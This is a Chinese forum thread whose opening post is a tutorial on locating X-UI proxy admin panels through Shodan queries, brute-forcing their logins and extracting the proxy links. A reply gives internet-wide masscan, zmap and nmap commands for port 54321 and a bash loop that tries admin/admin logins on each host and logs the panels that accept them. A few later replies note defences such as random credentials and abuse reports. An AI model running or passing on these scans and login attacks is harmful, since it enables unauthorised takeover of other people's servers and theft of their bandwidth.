共计 2080 个字符,预计需要花费 6 分钟才能阅读完成。
1. 从 shodan 抓取 XUI 链接 先安装初始化 shodan shodan count http.html: 登录 http.component:Vue.js http.component:Moment.js http.component:”Clipboard.js” http.title:” 登录 ” 得到数量 x shodan download http.html: 登录 http.component:Vue.js http.component:Moment.js http.component:”Clipboard.js” http.title:” 登录 ” –limit x shodan parse –fields ip_str,port –separator : http.html: 登录.json.gz > url_all.txt 现在 url_all.txt 里面就是 XUI 链接了 2. 爆破 XUI 脚本在这里,和 url_all.txtx 放在一个文件夹里运行,爆破完成后会输出到 success.txt 3. 从 XUI 提取代理链接 同样是放在同一文件夹,自行配置好 selenium 和 webdriver,需要在 windows/macos 下运行,linux 桌面试过了剪贴板有问题 https://pastebin.com/4TdzzhTx 到此教程结束,并鄙视靠这圈人头的行为 |
网友回复:
注册 : https://github.com/FranzKafkaYu/x-ui,你们喜欢扫,我就来让你们扫,登录失败会记录 IP,直接举报 abuse.
silence: 安装 debian 下都可以一键安装 apt install -y nmap zmap masscan 粗扫 先用这些软件进行端口粗扫,用哪个都行 masscan masscan 0.0.0.0/0 -p54321 –banners –exclude 255.255.255.255 -oJ scan.json zmap zmap –target-port=54321 –output-file=scan.log nmap nmap -sS 0.0.0.0/0 -p 54321 | grep -v failed > scan.log 弱口令尝试 早年一些某 ui 的一键安装脚本采用 admin/admin 的弱密码,很多人都懒得改,因此可以针对开放默认端口 54321 的服务器逐一尝试登录 #!/bin/bash for ip_ad in $(sed -nE ‘s/.*”ip”: “([^”]+)”.*/1/p’ scan.json); do if curl –max-time 1 http://$ip_ad:54321; then res=$(curl “http://${ip_ad}:54321/login” –data-raw ‘username=admin&password=admin’ –compressed –insecure) if [[“$res” =~ .*true.*]]; then echo $ip_ad | tee >> week.log fi echo $ip_ad | tee >> all.log fi done; week.log 里面就是所有扫出来的可以弱口令登录的机器,挺容易扫出来的 all.log 是改了密码的机器,有兴趣可以尝试进一步字典枚举
FranzkafkaYu: https://www.nodeseek.com/post-1084-1 教程我之前出过的,没藏着掖着 不知道 shodan 收录的完整性如何,我是直接把全球 ipv4 的 54321 端口扫了一遍
898198: 技术贴,厉害了。帮顶一下。
898198: 字典爆破?
惜为伊人醉 : 默认密码的总共就那些,再扫也扫不出来了
imgood: 默认密码 admin/admin 扫一下就够了,没必要专门去爆破
菊花帅比 : 技术贴,帮顶一下。
silence: v2fly 或者 xray 就一个 config 文件,搞不懂为什么要 UI。。
vlin: 我去年扫到现在了,越来越多。。。
注册 : 又学到了,但太多鸡鸡代理吃灰,机场也还有几年。。
注册 : 已阅
jzelynn: 自己没鸡吗,流量根本用不完
b66667777: https://hostloc.com/forum.php?mod=viewthread&tid=1137104 主要是怼这个
gajiodgaj: 改端口的扫不了吧?
silence: 我没有针对端口扫,是用的 shodan 的收录,改端口的也是有收录的
交配交的人 : 分享一下订阅呗
silence: 感谢大佬分享
CharmingYi: https://github.com/FranzKafkaYu/x-ui,你们喜欢扫,我就来让你们扫,登录失败会记录 IP,直接举报 abuse.
蛋饼 : 随机用户名 + 随机密码 + 随机端口 + 随机根路径,欢迎你们来扫。
注册 : 早晚会有这一天
注册 : 好贴顶了